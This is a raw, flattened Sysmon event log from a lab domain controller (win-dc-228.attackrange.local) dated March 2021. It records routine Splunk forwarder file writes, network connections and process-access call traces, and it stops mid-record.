Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D461A5C15F3E230F45E3F4896C8C4DB0,SHA256=B9D11FC962605E9682BCF8D05FB2C62D15EFE34B4AC33457F66BCEB78BFE7753,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202800Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:44.736{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8079A572A95CC2EDFEDC04E148121030,SHA256=1F5C042CBADB5C0F990EDE5896D9F44024A1AA0231CD22A20BBD0FA74F04A79A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202801Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:45.736{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E339BC46E529AE20E011EE6C3085B06,SHA256=A1E216AD1F5F8F90678E3285CF3C58BF1E19B919392EB381D0E4DED4F1EA9414,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202802Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:46.752{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46CB3A6829745E8BCC003075668E634C,SHA256=4FC21959D5684CF0D789DD08F4F15F840E1E9686EEA70AC3A2504F4EBB261D5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202804Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:47.767{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DF7809B59B44BD34C0A9EA512356EF0,SHA256=66CB96E722270C776EA315D2287238F5FE4AD2A68701A9DD8B32648F7159BA0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202803Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:47.095{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C9789ACB53422B57BD1F8FC5CAD6942D,SHA256=2C59AF11803AFE0584B5B2D41D295773DCFC73D5572EDF62C50B37D8150CE8E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202806Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:48.783{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7D2C040103F97EC117501F9867DA5EF,SHA256=DD4F1C2FC732C9F89A36599DB7707ADCC2BD34CE2701412F7E175744016F0441,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202805Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:43.916{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60671-false10.0.1.12-8000- 23542300x80000000000000002202807Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:49.783{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8223445AB16BC70F2C92FC9FBABBDC3F,SHA256=06D985EBFEE7CB0A398A796F31A4FE83DC035DFE45A755912A85441F4B1A4DC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202808Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:50.799{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D55A6F449E5516BDB99E98C9A0D40371,SHA256=B8E56699F416F6FCC1AC697C8E30D65F4B0C6486A136D39995E48406CE5A98FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202809Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:51.799{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F62ED7C8B8EB947B35BC89DA4679174B,SHA256=56B1F445D20F550F9EBC7597A192CB92F1AC556CB723A6E481D3CFCC3A61BA0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202812Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:52.814{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09627DFB9C72D90D5AC386E605E299C1,SHA256=4D082F8CA7FB34786CC82DC83F74AF4AD85ACF38B5060B7F9AF62822968DF920,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202811Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:52.189{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F025FAFA0B47F1DC94FC7FBB79FF829A,SHA256=0662A58349165F20B444D2E5A473B30933206F2B377A0F5677024D8723A336AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202810Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:52.189{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=90D620CE71DA519D8230F6B6A68761B1,SHA256=F2A49AD08C155C3AA6B51AA6F692969E92F5DA24437E451425ACD4F56A64EF3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202816Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:53.830{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3403AF7330FAAF0899F256210CD374DF,SHA256=2A128157C74F7D85AF50DA7F5E3212042DC8F2E5CA8E873369FB364E7DDB332C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202815Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:53.752{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F025FAFA0B47F1DC94FC7FBB79FF829A,SHA256=0662A58349165F20B444D2E5A473B30933206F2B377A0F5677024D8723A336AE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202814Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:49.556{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local63309- 354300x80000000000000002202813Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:49.010{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60672-false10.0.1.12-8000- 23542300x80000000000000002202817Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:54.845{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BACF0AF19F8824B7DDB286B6E22A694B,SHA256=095661CEA5B5A195946E6A7E59DF1542EBEA00D249FA9976D478D9B3D6C695B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202819Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:55.845{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=157EF0B82B215CCC214CEF24AF8AE658,SHA256=BA10D222D1C2C238FC8800E8C7BE20D5B110C4F344561188593DBF3CB2487EF7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202818Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:50.572{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-63309- 23542300x80000000000000002202820Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:56.861{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0749294623FC5D35A32976F86684D71,SHA256=B387598EDFEFD90775738F6A6F7B0C6B89F47ACD9D68848D100CB885C6608672,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202822Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:57.877{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=920C83FCF2FD9E1215129F8E935D5472,SHA256=086205B3A9634F0C84F27EE733A8E78FBB088BE9CA283510BDC502F10D468B37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202821Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:57.267{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=226F9B555C4B2179B85ECBDA178DAA56,SHA256=453EF88C8CE80EDB69AA62FD2EE484203ADD47354509C372D4876F3761256A6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202825Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:58.908{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FCAD43F7E3C4FA836E0B9B1C4325367,SHA256=576C70DFEE45079532A8F50EC0246D6C2BBCC2149C3CC0F067CDDEBF5B91ED3F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202824Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:53.885{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60673-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 354300x80000000000000002202823Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:53.885{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60673-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 23542300x80000000000000002202827Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:59.986{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B7B09258A981F3020B87597D9A7BF24,SHA256=C74F049A1695620C7B38779770C5AFC747E8E74F95A8109890602A7834370E0A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202826Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:54.041{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60674-false10.0.1.12-8000- 23542300x80000000000000002202828Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:00.564{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EC5CBDD6DE356E0DD91A95F207BE3808,SHA256=5584AFC4231A01FAC95355B862713214B160BBE7E17FEDBC8230B1280085A106,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202829Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:01.080{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1A583EC8E9DB6238FA60C193D0F49A9,SHA256=A01DA00ED5A40B693A9F9BECA8D19ABEB488647BAFC73DE83EFB416F862821E5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202847Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:02.861{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E94A-6040-344E-00000000AD01}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202846Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:02.861{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202845Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:02.861{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202844Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:02.861{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202843Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:02.861{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202842Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:02.861{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E94A-6040-344E-00000000AD01}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202841Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:02.861{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E94A-6040-344E-00000000AD01}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202840Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:02.862{5ABCFE62-E94A-6040-344E-00000000AD01}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002202839Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:02.314{5ABCFE62-E94A-6040-334E-00000000AD01}68365572C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002202838Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:02.205{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04C68148FD109C28BDD50E0137D360CD,SHA256=2CE9A215A19575E6384CC76DF5FD7BA1A1F9842F7546F2251C61A4D0B75420EE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202837Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:02.189{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E94A-6040-334E-00000000AD01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202836Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:02.189{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202835Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 